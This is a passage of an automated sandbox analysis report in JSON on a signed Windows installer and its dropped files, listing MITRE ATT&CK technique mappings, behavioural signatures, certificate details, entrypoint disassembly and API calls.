"informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 1, "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 2, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Network Share Discovery", "attck_id": "T1135", "attck_id_wiki": "https://attack.mitre.org/techniques/T1135", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 2}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 2, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Clipboard Data", "attck_id": "T1115", "attck_id_wiki": "https://attack.mitre.org/techniques/T1115", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Email Collection", "attck_id": "T1114", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 2, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Archive via Library", "attck_id": "T1560.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1560/002", "informative_identifiers_count": 1, "parent": {"technique": "Archive Collected Data", "attck_id": "T1560", "attck_id_wiki": "https://attack.mitre.org/techniques/T1560"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 6}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 6}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 6, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Exfiltration", "technique": "Exfiltration Over C2 Channel", "attck_id": "T1041", "attck_id_wiki": "https://attack.mitre.org/techniques/T1041", "suspicious_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-138", "type": 6, "relevance": 3, "name": "Calls an API typically used to create an instance of a named pipe", "description": "\"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"NtCreateNamedPipeFile\" (UID: 00000000-00004412)", "origin": "API Call", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\0\\Setup.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\")\n \"Sibuia.exe\" touched \"UIAutomation Client Central Class\" (Path: \"HKCU\\CLSID\\{FF48DBA4-60EF-4201-AA87-54103EEF594E}\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-3", "type": 10, "name": "Loads the .NET runtime environment", "description": "\"sibjs.exe\" loaded module \"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll\" at 64450000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"", "origin": "Created Mutant", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "General", "identifier": "certificate-0", "type": 17, "relevance": 10, "name": "The input sample is signed with a certificate", "description": "The input sample is signed with a certificate issued by \"CN=GlobalSign Code Signing Root R45, O=GlobalSign nv-sa, C=BE\" (SHA1: C1:0B:B7:6A:D4:EE:81:52:42:40:6A:1E:3E:11:17:FF:EC:74:3D:4F; see report for more information)\n The input sample is signed with a certificate issued by \"CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE\" (SHA1: 6E:0A:D8:7D:84:86:46:C9:6C:A2:54:DC:FA:FE:EA:02:0C:BD:4A:1C; see report for more information)", "origin": "Certificate Data", "attck_id": "T1553.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"Setup.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"Sibuia.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"Sibjs.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"333.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"siblog.dll\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"SibClr.dll\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"039F3.tmp\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,sub\tesp, 0x3f4,push\tebx,push\tesi,push\tedi,push\t0x20,pop\tedi,xor\tebx, ebx,push\t0x8001,mov\tdword ptr [ebp - 0x14], ebx,mov\tdword ptr [ebp - 4], 0x40a2e0,mov\tdword ptr [ebp - 0x10], ebx,call\tdword ptr [0x4080cc],mov\tesi, dword ptr [0x4080d0],lea\teax, [ebp - 0x140],push\teax,mov\tdword ptr [ebp - 0x12c], ebx,mov\tdword ptr [ebp - 0x2c], ebx,mov\tdword ptr [ebp - 0x28], ebx,mov\tdword ptr [ebp - 0x140], 0x11c,call\tesi,test\teax, eax,jne\t0x4035b7,lea\teax, [ebp - 0x140],mov\tdword ptr [ebp - 0x140], 0x114,push\teax,\"\n \"Setup.exe\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,add\tesp, -0x10,mov\teax, 0x66e544,call\t0x412804,mov\teax, dword ptr [0x682278],mov\teax, dword ptr [eax],call\t0x610684,mov\teax, dword ptr [0x682278],mov\teax, dword ptr [eax],mov\tedx, 0x677e30,call\t0x6100b8,mov\tecx, dword ptr [0x681ef0],mov\teax, dword ptr [0x682278],mov\teax, dword ptr [eax],mov\tedx, dword ptr [0x6401b0],call\t0x61069c,mov\teax, dword ptr [0x682278],mov\teax, dword ptr [eax],call\t0x6107fc,call\t0x40b14c,add\tbyte ptr [eax], al,mov\tal, 4,add\tal, byte ptr [eax],\"\n \"Sibuia.exe\" file has an entrypoint instructions - \"call\t0x56d5df,jmp\t0x56c810,mov\tecx, dword ptr [ebp - 0xc],mov\tdword ptr fs:[0], ecx,pop\tecx,pop\tedi,pop\tedi,pop\tesi,pop\tebx,mov\tesp, ebp,pop\tebp,push\tecx,ret\t,mov\tecx, dword ptr [ebp - 0x10],xor\tecx, ebp,call\t0x56c41b,jmp\t0x56c99c,mov\tecx, dword ptr [ebp - 0x14],xor\tecx, ebp,call\t0x56c41b,jmp\t0x56c99c,push\teax,push\tdword ptr fs:[0],lea\teax, [esp + 0xc],sub\tesp, dword ptr [esp + 0xc],push\tebx,push\tesi,push\tedi,mov\tdword ptr [eax], ebp,mov\tebp, eax,mov\teax, dword ptr [0x6021c0],xor\teax, ebp,push\teax,push\tdword ptr [ebp - 4],\"\n \"Sibjs.exe\" file has an entrypoint instructions - \"call\t0x556407,jmp\t0x5555e5,mov\tecx, dword ptr [ebp - 0xc],mov\tdword ptr fs:[0], ecx,pop\tecx,pop\tedi,pop\tedi,pop\tesi,pop\tebx,mov\tesp, ebp,pop\tebp,push\tecx,ret\t,mov\tecx, dword ptr [ebp - 0x10],xor\tecx, ebp,call\t0x555290,jmp\t0x555771,mov\tecx, dword ptr [ebp - 0x14],xor\tecx, ebp,call\t0x555290,jmp\t0x555771,push\teax,push\tdword ptr fs:[0],lea\teax, [esp + 0xc],sub\tesp, dword ptr [esp + 0xc],push\tebx,push\tesi,push\tedi,mov\tdword ptr [eax], ebp,mov\tebp, eax,mov\teax, dword ptr [0x5e3f80],xor\teax, ebp,push\teax,push\tdword ptr [ebp - 4],\"\n \"333.exe\" file has an entrypoint instructions - \"call\t0x41fa9b,jmp\t0x41f3b2,int3\t,int3\t,int3\t,int3\t,int3\t,int3\t,push\tebp,mov\tebp, esp,push\tesi,push\tdword ptr [ebp + 8],mov\tesi, ecx,call\t0x412210,mov\tdword ptr [esi], 0x4356d0,mov\teax, esi,pop\tesi,pop\tebp,ret\t4,and\tdword ptr [ecx + 4], 0,mov\teax, ecx,and\tdword ptr [ecx + 8], 0,mov\tdword ptr [ecx + 4], 0x4356d8,mov\tdword ptr [ecx], 0x4356d0,ret\t,int3\t,int3\t,int3\t,int3\t,int3\t,int3\t,int3\t,int3\t,int3\t,int3\t,int3\t,int3\t,int3\t,push\tebp,mov\tebp, esp,push\tesi,mov\tesi, ecx,lea\teax, [esi + 4],mov\tdword ptr [esi], 0x4356b8,push\teax,\"\n \"siblog.dll\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,cmp\tdword ptr [ebp + 0xc], 1,jne\t0x10004eb1,call\t0x10005312,push\tdword ptr [ebp + 0x10],push\tdword ptr [ebp + 0xc],push\tdword ptr [ebp + 8],call\t0x10004d6d,add\tesp, 0xc,pop\tebp,ret\t0xc,ret\t0,mov\tecx, dword ptr [ebp - 0xc],mov\tdword ptr fs:[0], ecx,pop\tecx,pop\tedi,pop\tedi,pop\tesi,pop\tebx,mov\tesp, ebp,pop\tebp,push\tecx,ret\t,mov\tecx, dword ptr [ebp - 0x10],xor\tecx, ebp,call\t0x10004afa,jmp\t0x10004ec9,push\teax,push\tdword ptr fs:[0],lea\teax, [esp + 0xc],sub\tesp, dword ptr [esp + 0xc],push\tebx,push\tesi,push\tedi,mov\tdword ptr [eax], ebp,mov\tebp, eax,\"\n \"SibClr.dll\" file has an entrypoint instructions - \"jmp\tdword ptr [0x10002000],add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,\"\n \"Zip.dll\" file has an entrypoint instructions - \"jmp\tdword ptr [0x10002000],add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,\"\n \"039F3.tmp\" file has an entrypoint instructions - \"jmp\tdword ptr [0x402000],add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoW (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00004412)\n 